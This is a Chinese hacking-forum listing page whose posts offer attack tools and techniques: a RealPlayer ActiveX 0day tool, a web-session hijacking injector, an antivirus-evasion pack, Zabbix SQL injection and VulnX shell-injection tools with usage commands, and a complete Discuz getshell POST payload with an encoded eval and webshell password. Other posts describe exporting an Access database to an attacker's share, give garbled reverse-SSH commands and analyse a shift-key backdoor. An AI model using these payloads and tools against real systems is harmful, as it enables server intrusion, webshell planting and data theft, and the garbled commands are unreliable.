动态 版块 发帖 消息 我的
Loading...
HadSky
支持原创软件,共创美好明天!
子版块
admin
21
好像10.5以下版本都中,这个似乎只能溢出一次,第一次溢出成功后,第二次开始会有realplay修复数据库的提示,点修复就中,取消不中上次测试使用的"Windows 按钮突破专家" 4.5K 溢出没问题,但是"iecv.exe"那个87K溢出的时候老是看不到界面,其实已经执行(进程中可以看到),不知道为什么(不知道是否大小问题)另:IE5不中,代码中直接跳过了Realplay ActiveX 0day 利用工具
 0   0  3天前
admin
15
No Arp欺骗的会话劫持工具,支持上行,下行双向劫持。发布时间: 2008年9月12日更新:整合Httphijack 的功能并大大提高效率;增加上行劫持方式 即可用于服务器网络;更新引擎库使用说明:1.设置网卡,网关IP,本地IP2.下行劫持: 例如本机为192.168.3.3 目标为同一个子网的192.168.3.4 那么192.168.3.4 访问任何网页都会被插入代码3.上行劫持:本机为220.223.222.221 目标为同一个子网的220.223.222.225 那么任何访问220.223.222.225的客户端都会被插入代码4.代理: 用于CAM欺骗的数据包的目的MAC地址5.被动恢复CAM :等待交换机自行恢复CAM表(不建议使用)6.HTTP注入:开启代码注入功能7.右侧控制条为劫持包的发包频率8.底部状态栏分别为: 状态 代理IP/MAC 目标IP 发包频率 网卡负载注意:请自行安装winpcap和.net 2.0 解压后运行!!!不可将本软件用于非法用途!否则后果自负MaxHijack 1.4
 0   0  3天前
admin
23
充值请直接联系我QQ:3307108272,本论坛充值api时不时抽风,有时候刷新一下就好了,有时候要等特别久,充值请联系我,以及充值未到账或者其他情况,均可联系我解决。
 0   0  4天前
admin
27
仅为绿色启动可过 因为是免费版!过360全套免杀包
 0   0  5天前
admin
33
漏洞概述:zabbix是一个开源的企业级性能监控解决方案。 官方网站:http://www.zabbix.comzabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。Zabbix漏洞检测注入工具
 0   0  5天前
admin
25
*本工具仅供技术分享、交流讨论,严禁用于非法用途VulnX是一款自动化Shell注入工具,支持多种类型的内容管理系统,其中包括Wordpress、Joomla、Drupal和Prestashop等等,广大研究人员可以使用VulnX来检测这些CMS系统中的安全问题。VulnX本质上是一款智能化Bot,可实现Shell自动注入,并帮助研究人员检测CMS系统中的安全漏洞。它可以执行快速CMS安全检测、信息收集(包括子域名、ip地址、国家信息、组织信息和时区等等)和漏洞扫描。功能介绍1、 检测CMS漏洞,支持wordpress, joomla, prestashop, drupal, opencart, magento, lokomedia;2、 目标信息收集;3、 目标子域名收集;4、 多线程扫描支持;5、 检测安全漏洞6、 自动Shell注入;7、 利用Dork搜索引擎;8、 高级端口扫描;9、 DNS服务器导出;10、同时扫描多个目标;11、Dork枚举;DNS映射用户课使用–dns或-d来对目标子域名执行DNS映射,并生成isetso.rnu.tn:vulnx-u isetso.rnu.tn --dns -d --output $PATH其中的$PATH变量存储的是结果图的存储地址。漏洞利用各CMS平台支持的扫描组件JoomlaCom JceCom JwallpapersCom JdownloadsCom Jdownloads2Com WeblinksCom FabrikCom FabrikCom Jdownloads IndexCom FoxcontactCom BlogCom UsersCom Ads ManagerCom SexycontactformCom MediaMod_simplefileuploadCom FacileformsCom FacileformsCom extplorerWordPressSimple Ads ManagerInBoundio MarketingWPshop eCommerceSynopticShowbiz ProJob ManagerFormcraftPowerZoomDownload ManagerCherryFrameworkCatproBlaze SlideShowWysija-NewslettersDrupalAdd AdminDrupal BruteForcerDrupal Geddon2PrestaShopattributewizardprocolumnadvertssoopamobilepk_flexmenupk_vertflexmenunvn_export_ordersmegamenutdpsthemeoptionpanelpsmodthemeoptionpanelmasseditproductblocktestimonialsoopabannersVtermslideshowsimpleslideshowproductpageadvertshomepageadvertisehomepageadvertise2jro_homepageadvertiseadvancedslidercartabandonmentprocartabandonmentproOldvideostabwg24themeadministrationfieldvmegamenuwdoptionpanelOpencartOpencart BruteForce可用的命令行选项 usage:vulnx [options]   -u --url              目标URL地址   -D --dorks            搜索Dock   -o --output           指定输出目录   -t --timeout          HTTP请求超时   -c --cms-info         搜索CMS信息,包括主题、插件、用户和版本   -e --exploit           扫描并利用安全漏洞   -w --web-info        Web信息收集   -d --domain-info     子域名信息收集   -l, --dork-list         枚举Dork列表   -n, --number-page   搜索引擎的页面数量(Google)   -p, --ports           端口扫描   -i, --input            从输入文件导入目标域名   --threads            扫描线程数量   --dns                DNS信息收集 工具安装Docker安装 $ git clone https://github.com/anouarbensaad/VulnX.git $ cd VulnX $ docker build -t vulnx ./docker/ $ docker run -it --name vulnx vulnx:latest -u http://exemple.com 查看日志文件:$ docker run -it --name vulnx -v "$PWD/logs:/VulnX/logs" vulnx:latest-u http://exemple.comUbuntu安装 $ git clone https://github.com/anouarbensaad/vulnx.git $ cdVulnX $ chmod +x install.sh $ ./install.sh Termux安装 $ pkg update $ pkg install -y git $ git clone http://github.com/anouarbensaad/vulnx $ cd vulnx $ chmod +x install.sh $ ./install.sh 工具常用命令参考命令样本:settimeout=3 , cms-gathering = all , -d subdomains-gathering , run–exploitsvulnx -u http://example.com --timeout 3 -c all -d -w –exploit搜索Dork样本命令:-D or –dorks , -l –list-dorksvulnx–list-dorks命令将会返回可利用漏洞表。搜索单个目标网站选项:-u或–urlvulnx -u http://example.com扫描超时选项:–timeout(默认为3秒)vulnx-u http://example.com --timeout=4运行漏洞利用模块选项:–exploit或-evulnx-u http://example.com --exploitCMS信息收集选项:–cms-info或-cvulnx-u http://example.com --cms-info all子域名&IP信息收集选项:–domain-info或-dvulnx-u http://example.com --domain-info网站信息收集选项:–web-info或-wvulnx-u http://example.com --web-info扫描开放端口选项:–ports或-pvulnx-u http://example.com --portsDNS信息收集选项:–dnsvulnx-u http://example.com --dns项目地址VulnX:【GitHub传送门】许可证协议本项目遵循GPL-v3.0开源许可证协议。
 0   0  6天前
admin
78
有些论坛 可能路径放在其它目录 没有utility 直接convert等如果看到 转换程序的 data/ 目录不可写 就不用试了 不成功http://webshell.cc/utility/convert/index.php?a=config&source=d7.2_x2.0post提交:a=config&source=d7.2_x2.0&submit=yes&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5baaa%0d%0a%0d%0aeval(Chr(101%29.Chr%28118%29.Chr%2897%29.Chr%28108%29.Chr%2840%29.Chr%2834%29.Chr%2836%29.Chr%2895%29.Chr%2880%29.Chr%2879%29.Chr%2883%29.Chr%2884%29.Chr%2891%29.Chr%28116%29.Chr%28111%29.Chr%28109%29.Chr%2893%29.Chr%2859%29.Chr%2834%29.Chr%2841%29.Chr%2859%29%29%3b%2f%2f%5d=localhost&newconfig%5bsource%5d%5bdbuser%5d=root&newconfig%5bsource%5d%5bdbpw%5d=&newconfig%5bsource%5d%5bdbname%5d=discuz&newconfig%5bsource%5d%5btablepre%5d=cdb_&newconfig%5bsource%5d%5bdbcharset%5d=&newconfig%5bsource%5d%5bpconnect%5d=1&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5btarget%5d%5bdbuser%5d=root&newconfig%5btarget%5d%5bdbpw%5d=&newconfig%5btarget%5d%5bdbname%5d=discuzx&newconfig%5btarget%5d%5btablepre%5d=pre_&newconfig%5btarget%5d%5bdbcharset%5d=&newconfig%5btarget%5d%5bpconnect%5d=1&submit=%b1%a3%b4%e6%b7%fe%ce%f1%c6%f7%c9%e8%d6%c3http://webshell.cc/utility/convert/data/config.inc.php 密码是tom经检测:DZ X1.5 2.0 3.1 等均成功GetShell
 0   0  46天前
admin
71
接触Linux恐怕对SSH再熟悉不过了,还有scp,sftp各种方便的功能,一般的使用都需要ip:port(如果不是默认22的话),但有些情况比较特殊,就是想连接一台内网主机(比如公司内网,当然你肯定做不了Port Forwarding,除非你想在公司防火墙上拆个洞)。稍懂一点网络的童鞋会明白,Internet上去主动连接一台内网是不可能的,一般的解决方案分两种,一种是端口映射(Port Forwarding),将内网主机的某个端口Open出防火墙,相当于两个外网主机通信;另一种是内网主机主动连接到外网主机,又被称作反向连接(Reverse Connection),这样NAT路由/防火墙就会在内网主机和外网主机之间建立映射,自然可以相互通信了。但是,这种映射是NAT路由自动维持的,不会持续下去,如果连接断开或者网络不稳定都会导致通信失败,这时内网主机需要再次主动连接到外网主机,建立连接。 1.1.首先在B上执行 ssh12342223123.123123.123$ -ant 0128127.00.1$ localhost -p1234   2.一开始提到,这种反向连接(Reverse Connection)不稳定,可能随时断开,需要内网主机B再次向外网A发起连接,这时需要个“朋友”帮你在内网B主机执行这条命令。它就是Autossh。 在此之前还要解决之前的一个问题,那就是每次内网主机B连接外网主机A时都需要输入密码,这个问题ssh本身是提供另外一种验证方式——通过密钥验证用户身份,实现自动登录。   2.1.在内网B主机上生产公钥和私钥 ssh-keygensshlsssh$ id_rsa.pub >> ~/./authorized_keys 试下,内网B主机连接外网A主机,就不再输入密码验证了 补充:今天了解到ssh-copy-id这个命令,上面这个操作就变的简单了 sshid$ -M -NR :localhost: user1@. -p2221 比之前的命令添加的一个-M 5678参数,负责通过5678端口监视连接状态,连接有问题时就会自动重连,去掉了一个-f参数,因为autossh本身就会在background运行。  ssh123.123123.123/bin/su' -M -NR :localhost: user1@. -p2221'
 0   0  46天前
admin
75
已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。 最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。 几个月之前网上就流传利用SQL注入Access导出数据库内容到文本文件(可导出txt、htm、html等格式)的方法: SELECT * into [test.txt] in ’d:\web\’ ’text;’ from admin 执行上述语句,在d:\web目录下就会生成test.txt文件,其内容就是表admin的内容。但是导出asp格式就不行,会说“不能更新,数据库或对象为只读”。 其实控制导出文件后缀是存储在注册表的,具体键值是HKEY_LOCALMACHINE\Software\Microsoft\Jet\4.0\Engines\Text\DisableExtension,默认情况下值为“!txt,csv,tab,asc,tmp,htm,html”,如果我们把asp也添加进去的话,呵呵,就可以导出asp格式的文件了。 这个方法跟那个调用Access的Shell函数执行命令一样,要修改注册表,所以利用不是很大。 顺便提一下,前面提到的导出文本文件的方法如果不知道web路径貌似可以导出到自己机器的哦:SELECT * into [test.txt] in ’\\yourip\share’ ’text;’ from admin
 0   0  46天前
admin
70
昨天看了个shift后门,下载玩弄了一下,由于太晚没详细写过程,今天做了个详细点的图文过程说明下破解的经过.有关shift后门的激活方式,目前发现的就这么几种1.使用键盘事件通过快捷键激活2.使用鼠标事件通过单击或双击界面某处激活3.使用键盘事件及鼠标事件相结合的方式激活  以上所说的是高防后门的激活方式,rar自解压的不在此范围之内,后门的编程语言目前发现以vb,delphi和c++等语言为主.对于shift后门的破解,网上鲜见教程,曾经搜索了很久,只好自己摸索.也曾在华夏77169发布过两篇vb后门的破解过程.废话不多说,来看liurui569 发的这个后门.此后门为delphi编写的后门.无壳,这样就省略了脱壳的步骤了.测试运行后门发现后门运行后,复制自身到c:\windows\fonts\fonts.exe下,并且劫持注册表指向该路径,同时程序还执行过某些系统程序,通过软件侦测到的部分数据新建 C:\WINDOWS\Prefetch\CACLS.EXE-25504E4A.pf新建 C:\WINDOWS\Prefetch\CACLS.EXE-25504E4A.pf新建 C:\System Volume Information\_restore{5828498B-E212-48E2-B40C-3D66645342F0}\RP9\A0005390.exe新建 C:\System Volume Information\_restore{5828498B-E212-48E2-B40C-3D66645342F0}\RP9\A0005391.exe新建 C:\WINDOWS\Fonts\fonts.exe新建 C:\WINDOWS\Prefetch\SC.EXE-012262AF.pf新建 C:\WINDOWS\Prefetch\SETHC.EXE-23CFB742.pf这些具体都是些什么行为,没深入检测,主要关注下程序的激活方式和密码.程序载入资源编辑工具pexplorer.exe中,对软件的相关资源进行查看分析.我们主要看rc数据,前两项为系统自动生成的,看下面三项TPASS项是密码输入窗口Tuser是后门的功能界面窗口,TX项为sethc的程序界面.在TPASS里面的一个TEDIT的控件text项发现一组数值6521206,暂时记下来很有可能是密码,没到最后验证一切都是未知.这里我们主要关注下sethc的主界面,因为激活方式的线索都在这个项目里.注意看下主界面使用了5个Label控件和三个Button控件,没有多余的控件,有的密码输入框激活后在主界面的就会多用一个Label控件,我曾经写过一个shift后门就是用的这种方式.因此开始我就猜他是使用的键盘事件激活的.后来继续分析每个控件后发现了秘密.看到吧,这个Label3.Label4.Label5三个控件都用到了一个ONdblclick,玩过delphi的人都知道,这是个鼠标双击事件,在Label的控件上出现双击事件是非常可疑的,所以可以肯定这个后门用到了鼠标事件激活,因为用鼠标和键盘事件结合写后门的似乎还是比较少的,所以初步分析后就可以进行试运行测试了,既然有三组鼠标双击事件,那么必然就有个顺序问题第一次测试Label3-5分别双击,无法激活,反序依然,第三次进行循环测试Label3-4-5-3,这时就出现了密码输入界面了,但是Label3双击了两次才出现应该不正常,最后确定了双击的顺序是Label4-5-3, 呵呵完美.程序正常激活进行密码测试,输入刚才得到的6521206这组数值,成功进入.至此对于该后门的激活方式就分析完成了,至于软件的行为分析不在此过程之列.总结,此后门算是一个相当简单的shift后门,登陆密码未进行有效保护,以致非常简单的就获取到了正确的密码,甚至不需要动用到静态或动态的分析工具,一个资源编辑器就可以查找到,激活方式难度不高,如果采用键盘事件激活的就要动用OD等分析工具进行跟踪了,通过对这个后门的分析,为大家分析其他后门以及破解,提供一种思路.分析过程就到这里了.
 0   0  46天前
快速发帖 高级模式
guest
登录之后更精彩~
Powered by HadSky 7.3.3
© 2015-2019 PuYueTian
您的IP:3.227.2.109,2019-10-18 11:43:16,Processed in 0.02282 second(s).
Powered by HadSky
本站技术仅供学习,抵制违法使用,共建绿色互联网!